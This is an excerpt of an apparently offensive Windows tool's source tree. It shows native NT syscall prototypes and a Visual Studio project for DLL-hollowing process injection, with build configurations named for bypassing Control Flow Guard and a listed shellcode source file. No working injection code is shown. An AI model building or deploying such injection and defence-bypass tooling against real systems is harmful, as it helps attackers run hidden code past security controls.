160 | 	IN HANDLE ObjectHandle,
161 | 	IN BOOLEAN Alertable,
162 | 	IN PLARGE_INTEGER TimeOut OPTIONAL);
163 | 
164 | EXTERN_C NTSTATUS NtCreateThread(
165 | 	OUT PHANDLE ThreadHandle,
166 | 	IN ACCESS_MASK DesiredAccess,
167 | 	IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
168 | 	IN HANDLE ProcessHandle,
169 | 	OUT PCLIENT_ID ClientId,
170 | 	IN PCONTEXT ThreadContext,
171 | 	IN PUSER_STACK InitialTeb,
172 | 	IN BOOLEAN CreateSuspended);
173 | 
174 | EXTERN_C NTSTATUS NtMapViewOfSection(
175 | 	IN HANDLE SectionHandle,
176 | 	IN HANDLE ProcessHandle,
177 | 	IN OUT PVOID BaseAddress,
178 | 	IN ULONG ZeroBits,
179 | 	IN SIZE_T CommitSize,
180 | 	IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
181 | 	IN OUT PSIZE_T ViewSize,
182 | 	IN SECTION_INHERIT InheritDisposition,
183 | 	IN ULONG AllocationType,
184 | 	IN ULONG Win32Protect);
185 | 
186 | EXTERN_C NTSTATUS NtCreateSection(
187 | 	OUT PHANDLE SectionHandle,
188 | 	IN ACCESS_MASK DesiredAccess,
189 | 	IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
190 | 	IN PLARGE_INTEGER MaximumSize OPTIONAL,
191 | 	IN ULONG SectionPageProtection,
192 | 	IN ULONG AllocationAttributes,
193 | 	IN HANDLE FileHandle OPTIONAL);
194 | 
195 | #endif


--------------------------------------------------------------------------------
/process_injection_dll_hollow_syscalls/process_injection_dll_hollow_syscalls.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Bypass CFG (NTDLL Patch)|Win32">
  5 |       <Configuration>Bypass CFG (NTDLL Patch)</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Bypass CFG (NTDLL Patch)|x64">
  9 |       <Configuration>Bypass CFG (NTDLL Patch)</Configuration>
 10 |       <Platform>x64</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="CFG Disabled|Win32">
 13 |       <Configuration>CFG Disabled</Configuration>
 14 |       <Platform>Win32</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="CFG Disabled|x64">
 17 |       <Configuration>CFG Disabled</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |     <ProjectConfiguration Include="CFG Enabled - Bypass CFG( Thread CTX)|Win32">
 21 |       <Configuration>CFG Enabled - Bypass CFG( Thread CTX)</Configuration>
 22 |       <Platform>Win32</Platform>
 23 |     </ProjectConfiguration>
 24 |     <ProjectConfiguration Include="CFG Enabled - Bypass CFG( Thread CTX)|x64">
 25 |       <Configuration>CFG Enabled - Bypass CFG( Thread CTX)</Configuration>
 26 |       <Platform>x64</Platform>
 27 |     </ProjectConfiguration>
 28 |     <ProjectConfiguration Include="CFG Enabled|Win32">
 29 |       <Configuration>CFG Enabled</Configuration>
 30 |       <Platform>Win32</Platform>
 31 |     </ProjectConfiguration>
 32 |     <ProjectConfiguration Include="CFG Enabled|x64">
 33 |       <Configuration>CFG Enabled</Configuration>
 34 |       <Platform>x64</Platform>
 35 |     </ProjectConfiguration>
 36 |     <ProjectConfiguration Include="Debug|Win32">
 37 |       <Configuration>Debug</Configuration>
 38 |       <Platform>Win32</Platform>
 39 |     </ProjectConfiguration>
 40 |     <ProjectConfiguration Include="Release|Win32">
 41 |       <Configuration>Release</Configuration>
 42 |       <Platform>Win32</Platform>
 43 |     </ProjectConfiguration>
 44 |     <ProjectConfiguration Include="Debug|x64">
 45 |       <Configuration>Debug</Configuration>
 46 |       <Platform>x64</Platform>
 47 |     </ProjectConfiguration>
 48 |     <ProjectConfiguration Include="Release|x64">
 49 |       <Configuration>Release</Configuration>
 50 |       <Platform>x64</Platform>
 51 |     </ProjectConfiguration>
 52 |   </ItemGroup>
 53 |   <PropertyGroup Label="Globals">
 54 |     <VCProjectVersion>16.0</VCProjectVersion>
 55 |     <Keyword>Win32Proj</Keyword>
 56 |     <ProjectGuid>{a2efab2f-84d0-419a-8de7-9ca18092bc47}</ProjectGuid>
 57 |     <RootNamespace>processinjectiondllhollowsyscallsnoCFG</RootNamespace>
 58 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 59 |     <ProjectName>process_injection_dll_hollow_syscalls</ProjectName>
 60 |   </PropertyGroup>
 61 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 62 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 63 |     <ConfigurationType>Application</ConfigurationType>
 64 |     <UseDebugLibraries>true</UseDebugLibraries>
 65 |     <PlatformToolset>v142</PlatformToolset>
 66 |     <CharacterSet>Unicode</CharacterSet>
 67 |   </PropertyGroup>
 68 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 69 |     <ConfigurationType>Application</ConfigurationType>
 70 |     <UseDebugLibraries>false</UseDebugLibraries>
 71 |     <PlatformToolset>v142</PlatformToolset>
 72 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 73 |     <CharacterSet>Unicode</CharacterSet>
 74 |   </PropertyGroup>
 75 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='CFG Disabled|Win32'" Label="Configuration">
 76 |     <ConfigurationType>Application</ConfigurationType>
 77 |     <UseDebugLibraries>false</UseDebugLibraries>
 78 |     <PlatformToolset>v142</PlatformToolset>
 79 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 80 |     <CharacterSet>Unicode</CharacterSet>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='CFG Enabled|Win32'" Label="Configuration">
 83 |     <ConfigurationType>Application</ConfigurationType>
 84 |     <UseDebugLibraries>false</UseDebugLibraries>
 85 |     <PlatformToolset>v142</PlatformToolset>
 86 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 87 |     <CharacterSet>Unicode</CharacterSet>
 88 |   </PropertyGroup>
 89 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='CFG Enabled - Bypass CFG( Thread CTX)|Win32'" Label="Configuration">
 90 |     <ConfigurationType>Application</ConfigurationType>
 91 |     <UseDebugLibraries>false</UseDebugLibraries>
 92 |     <PlatformToolset>v142</PlatformToolset>
 93 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 94 |     <CharacterSet>Unicode</CharacterSet>
 95 |   </PropertyGroup>
 96 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Bypass CFG (NTDLL Patch)|Win32'" Label="Configuration">
 97 |     <ConfigurationType>Application</ConfigurationType>
 98 |     <UseDebugLibraries>false</UseDebugLibraries>
 99 |     <PlatformToolset>v142</PlatformToolset>
100 |     <WholeProgramOptimization>true</WholeProgramOptimization>
101 |     <CharacterSet>Unicode</CharacterSet>
102 |   </PropertyGroup>
103 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
104 |     <ConfigurationType>Application</ConfigurationType>
105 |     <UseDebugLibraries>true</UseDebugLibraries>
106 |     <PlatformToolset>v142</PlatformToolset>
107 |     <CharacterSet>Unicode</CharacterSet>
108 |   </PropertyGroup>
109 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
110 |     <ConfigurationType>Application</ConfigurationType>
111 |     <UseDebugLibraries>false</UseDebugLibraries>
112 |     <PlatformToolset>v142</PlatformToolset>
113 |     <WholeProgramOptimization>true</WholeProgramOptimization>
114 |     <CharacterSet>Unicode</CharacterSet>
115 |   </PropertyGroup>
116 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='CFG Disabled|x64'" Label="Configuration">
117 |     <ConfigurationType>Application</ConfigurationType>
118 |     <UseDebugLibraries>false</UseDebugLibraries>
119 |     <PlatformToolset>v142</PlatformToolset>
120 |     <WholeProgramOptimization>true</WholeProgramOptimization>
121 |     <CharacterSet>Unicode</CharacterSet>
122 |   </PropertyGroup>
123 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='CFG Enabled|x64'" Label="Configuration">
124 |     <ConfigurationType>Application</ConfigurationType>
125 |     <UseDebugLibraries>false</UseDebugLibraries>
126 |     <PlatformToolset>v142</PlatformToolset>
127 |     <WholeProgramOptimization>true</WholeProgramOptimization>
128 |     <CharacterSet>Unicode</CharacterSet>
129 |   </PropertyGroup>
130 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='CFG Enabled - Bypass CFG( Thread CTX)|x64'" Label="Configuration">
131 |     <ConfigurationType>Application</ConfigurationType>
132 |     <UseDebugLibraries>false</UseDebugLibraries>
133 |     <PlatformToolset>v142</PlatformToolset>
134 |     <WholeProgramOptimization>true</WholeProgramOptimization>
135 |     <CharacterSet>Unicode</CharacterSet>
136 |   </PropertyGroup>
137 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Bypass CFG (NTDLL Patch)|x64'" Label="Configuration">
138 |     <ConfigurationType>Application</ConfigurationType>
139 |     <UseDebugLibraries>false</UseDebugLibraries>
140 |     <PlatformToolset>v142</PlatformToolset>
141 |     <WholeProgramOptimization>true</WholeProgramOptimization>
142 |     <CharacterSet>Unicode</CharacterSet>
143 |   </PropertyGroup>
144 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
145 |   <ImportGroup Label="ExtensionSettings">
146 |     <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
147 |   </ImportGroup>
148 |   <ImportGroup Label="Shared">
149 |   </ImportGroup>
150 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
151 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
152 |   </ImportGroup>
153 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
154 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
155 |   </ImportGroup>
156 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='CFG Disabled|Win32'" Label="PropertySheets">
157 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
158 |   </ImportGroup>
159 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='CFG Enabled|Win32'" Label="PropertySheets">
160 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
161 |   </ImportGroup>
162 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='CFG Enabled - Bypass CFG( Thread CTX)|Win32'" Label="PropertySheets">
163 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
164 |   </ImportGroup>
165 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Bypass CFG (NTDLL Patch)|Win32'" Label="PropertySheets">
166 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
167 |   </ImportGroup>
168 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
169 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
170 |   </ImportGroup>
171 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
172 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
173 |   </ImportGroup>
174 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='CFG Disabled|x64'" Label="PropertySheets">
175 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
176 |   </ImportGroup>
177 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='CFG Enabled|x64'" Label="PropertySheets">
178 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
179 |   </ImportGroup>
180 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='CFG Enabled - Bypass CFG( Thread CTX)|x64'" Label="PropertySheets">
181 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
182 |   </ImportGroup>
183 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Bypass CFG (NTDLL Patch)|x64'" Label="PropertySheets">
184 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
185 |   </ImportGroup>
186 |   <PropertyGroup Label="UserMacros" />
187 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
188 |     <LinkIncremental>true</LinkIncremental>
189 |   </PropertyGroup>
190 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
191 |     <LinkIncremental>false</LinkIncremental>
192 |   </PropertyGroup>
193 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='CFG Disabled|Win32'">
194 |     <LinkIncremental>false</LinkIncremental>
195 |   </PropertyGroup>
196 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='CFG Enabled|Win32'">
197 |     <LinkIncremental>false</LinkIncremental>
198 |   </PropertyGroup>
199 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='CFG Enabled - Bypass CFG( Thread CTX)|Win32'">
200 |     <LinkIncremental>false</LinkIncremental>
201 |   </PropertyGroup>
202 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Bypass CFG (NTDLL Patch)|Win32'">
203 |     <LinkIncremental>false</LinkIncremental>
204 |   </PropertyGroup>
205 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
206 |     <LinkIncremental>true</LinkIncremental>
207 |   </PropertyGroup>
208 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
209 |     <LinkIncremental>false</LinkIncremental>
210 |   </PropertyGroup>
211 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='CFG Disabled|x64'">
212 |     <LinkIncremental>false</LinkIncremental>
213 |   </PropertyGroup>
214 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='CFG Enabled|x64'">
215 |     <LinkIncremental>false</LinkIncremental>
216 |   </PropertyGroup>
217 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='CFG Enabled - Bypass CFG( Thread CTX)|x64'">
218 |     <LinkIncremental>false</LinkIncremental>
219 |   </PropertyGroup>
220 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Bypass CFG (NTDLL Patch)|x64'">
221 |     <LinkIncremental>false</LinkIncremental>
222 |   </PropertyGroup>
223 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
224 |     <ClCompile>
225 |       <WarningLevel>Level3</WarningLevel>
226 |       <SDLCheck>true</SDLCheck>
227 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
228 |       <ConformanceMode>true</ConformanceMode>
229 |     </ClCompile>
230 |     <Link>
231 |       <SubSystem>Console</SubSystem>
232 |       <GenerateDebugInformation>true</GenerateDebugInformation>
233 |     </Link>
234 |   </ItemDefinitionGroup>
235 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
236 |     <ClCompile>
237 |       <WarningLevel>Level3</WarningLevel>
238 |       <FunctionLevelLinking>true</FunctionLevelLinking>
239 |       <IntrinsicFunctions>true</IntrinsicFunctions>
240 |       <SDLCheck>true</SDLCheck>
241 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
242 |       <ConformanceMode>true</ConformanceMode>
243 |     </ClCompile>
244 |     <Link>
245 |       <SubSystem>Console</SubSystem>
246 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
247 |       <OptimizeReferences>true</OptimizeReferences>
248 |       <GenerateDebugInformation>true</GenerateDebugInformation>
249 |     </Link>
250 |   </ItemDefinitionGroup>
251 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='CFG Disabled|Win32'">
252 |     <ClCompile>
253 |       <WarningLevel>Level3</WarningLevel>
254 |       <FunctionLevelLinking>true</FunctionLevelLinking>
255 |       <IntrinsicFunctions>true</IntrinsicFunctions>
256 |       <SDLCheck>true</SDLCheck>
257 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
258 |       <ConformanceMode>true</ConformanceMode>
259 |     </ClCompile>
260 |     <Link>
261 |       <SubSystem>Console</SubSystem>
262 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
263 |       <OptimizeReferences>true</OptimizeReferences>
264 |       <GenerateDebugInformation>true</GenerateDebugInformation>
265 |     </Link>
266 |   </ItemDefinitionGroup>
267 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='CFG Enabled|Win32'">
268 |     <ClCompile>
269 |       <WarningLevel>Level3</WarningLevel>
270 |       <FunctionLevelLinking>true</FunctionLevelLinking>
271 |       <IntrinsicFunctions>true</IntrinsicFunctions>
272 |       <SDLCheck>true</SDLCheck>
273 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
274 |       <ConformanceMode>true</ConformanceMode>
275 |     </ClCompile>
276 |     <Link>
277 |       <SubSystem>Console</SubSystem>
278 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
279 |       <OptimizeReferences>true</OptimizeReferences>
280 |       <GenerateDebugInformation>true</GenerateDebugInformation>
281 |     </Link>
282 |   </ItemDefinitionGroup>
283 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='CFG Enabled - Bypass CFG( Thread CTX)|Win32'">
284 |     <ClCompile>
285 |       <WarningLevel>Level3</WarningLevel>
286 |       <FunctionLevelLinking>true</FunctionLevelLinking>
287 |       <IntrinsicFunctions>true</IntrinsicFunctions>
288 |       <SDLCheck>true</SDLCheck>
289 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
290 |       <ConformanceMode>true</ConformanceMode>
291 |     </ClCompile>
292 |     <Link>
293 |       <SubSystem>Console</SubSystem>
294 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
295 |       <OptimizeReferences>true</OptimizeReferences>
296 |       <GenerateDebugInformation>true</GenerateDebugInformation>
297 |     </Link>
298 |   </ItemDefinitionGroup>
299 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Bypass CFG (NTDLL Patch)|Win32'">
300 |     <ClCompile>
301 |       <WarningLevel>Level3</WarningLevel>
302 |       <FunctionLevelLinking>true</FunctionLevelLinking>
303 |       <IntrinsicFunctions>true</IntrinsicFunctions>
304 |       <SDLCheck>true</SDLCheck>
305 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
306 |       <ConformanceMode>true</ConformanceMode>
307 |     </ClCompile>
308 |     <Link>
309 |       <SubSystem>Console</SubSystem>
310 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
311 |       <OptimizeReferences>true</OptimizeReferences>
312 |       <GenerateDebugInformation>true</GenerateDebugInformation>
313 |     </Link>
314 |   </ItemDefinitionGroup>
315 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
316 |     <ClCompile>
317 |       <WarningLevel>Level3</WarningLevel>
318 |       <SDLCheck>true</SDLCheck>
319 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
320 |       <ConformanceMode>true</ConformanceMode>
321 |     </ClCompile>
322 |     <Link>
323 |       <SubSystem>Console</SubSystem>
324 |       <GenerateDebugInformation>true</GenerateDebugInformation>
325 |     </Link>
326 |   </ItemDefinitionGroup>
327 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
328 |     <ClCompile>
329 |       <WarningLevel>Level3</WarningLevel>
330 |       <FunctionLevelLinking>true</FunctionLevelLinking>
331 |       <IntrinsicFunctions>true</IntrinsicFunctions>
332 |       <SDLCheck>true</SDLCheck>
333 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
334 |       <ConformanceMode>true</ConformanceMode>
335 |       <ControlFlowGuard>Guard</ControlFlowGuard>
336 |     </ClCompile>
337 |     <Link>
338 |       <SubSystem>Console</SubSystem>
339 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
340 |       <OptimizeReferences>true</OptimizeReferences>
341 |       <GenerateDebugInformation>true</GenerateDebugInformation>
342 |     </Link>
343 |   </ItemDefinitionGroup>
344 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='CFG Disabled|x64'">
345 |     <ClCompile>
346 |       <WarningLevel>Level3</WarningLevel>
347 |       <FunctionLevelLinking>true</FunctionLevelLinking>
348 |       <IntrinsicFunctions>true</IntrinsicFunctions>
349 |       <SDLCheck>true</SDLCheck>
350 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
351 |       <ConformanceMode>true</ConformanceMode>
352 |       <ControlFlowGuard>false</ControlFlowGuard>
353 |     </ClCompile>
354 |     <Link>
355 |       <SubSystem>Console</SubSystem>
356 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
357 |       <OptimizeReferences>true</OptimizeReferences>
358 |       <GenerateDebugInformation>true</GenerateDebugInformation>
359 |     </Link>
360 |   </ItemDefinitionGroup>
361 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='CFG Enabled|x64'">
362 |     <ClCompile>
363 |       <WarningLevel>Level3</WarningLevel>
364 |       <FunctionLevelLinking>true</FunctionLevelLinking>
365 |       <IntrinsicFunctions>true</IntrinsicFunctions>
366 |       <SDLCheck>true</SDLCheck>
367 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
368 |       <ConformanceMode>true</ConformanceMode>
369 |       <ControlFlowGuard>Guard</ControlFlowGuard>
370 |     </ClCompile>
371 |     <Link>
372 |       <SubSystem>Console</SubSystem>
373 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
374 |       <OptimizeReferences>true</OptimizeReferences>
375 |       <GenerateDebugInformation>true</GenerateDebugInformation>
376 |     </Link>
377 |   </ItemDefinitionGroup>
378 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='CFG Enabled - Bypass CFG( Thread CTX)|x64'">
379 |     <ClCompile>
380 |       <WarningLevel>Level3</WarningLevel>
381 |       <FunctionLevelLinking>true</FunctionLevelLinking>
382 |       <IntrinsicFunctions>true</IntrinsicFunctions>
383 |       <SDLCheck>true</SDLCheck>
384 |       <PreprocessorDefinitions>BYPASS_CFG_THREAD_CTX;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
385 |       <ConformanceMode>true</ConformanceMode>
386 |       <ControlFlowGuard>Guard</ControlFlowGuard>
387 |     </ClCompile>
388 |     <Link>
389 |       <SubSystem>Console</SubSystem>
390 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
391 |       <OptimizeReferences>true</OptimizeReferences>
392 |       <GenerateDebugInformation>true</GenerateDebugInformation>
393 |     </Link>
394 |   </ItemDefinitionGroup>
395 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Bypass CFG (NTDLL Patch)|x64'">
396 |     <ClCompile>
397 |       <WarningLevel>Level3</WarningLevel>
398 |       <FunctionLevelLinking>true</FunctionLevelLinking>
399 |       <IntrinsicFunctions>true</IntrinsicFunctions>
400 |       <SDLCheck>true</SDLCheck>
401 |       <PreprocessorDefinitions>BYPASS_CFG_NTDLL;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
402 |       <ConformanceMode>true</ConformanceMode>
403 |       <ControlFlowGuard>Guard</ControlFlowGuard>
404 |     </ClCompile>
405 |     <Link>
406 |       <SubSystem>Console</SubSystem>
407 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
408 |       <OptimizeReferences>true</OptimizeReferences>
409 |       <GenerateDebugInformation>true</GenerateDebugInformation>
410 |     </Link>
411 |   </ItemDefinitionGroup>
412 |   <ItemGroup>
413 |     <ClCompile Include="src\dllHollow.c" />
414 |     <ClCompile Include="src\main.cpp" />
415 |     <ClCompile Include="src\shellcode.c" />
416 |     <ClCompile Include="src\syscalls.c" />
417 |   </ItemGroup>
418 |   <ItemGroup>
419 |     <ClInclude Include="src\dllHollow.h" />
420 |     <ClInclude Include="src\syscalls.h" />
421 |   </ItemGroup>
422 |   <ItemGroup>
423 |     <MASM Include="src\syscallsstubs.asm" />
424 |   </ItemGroup>
425 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
426 |   <ImportGroup Label="ExtensionTargets">
427 |     <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
428 |   </ImportGroup>
429 | </Project>


--------------------------------------------------------------------------------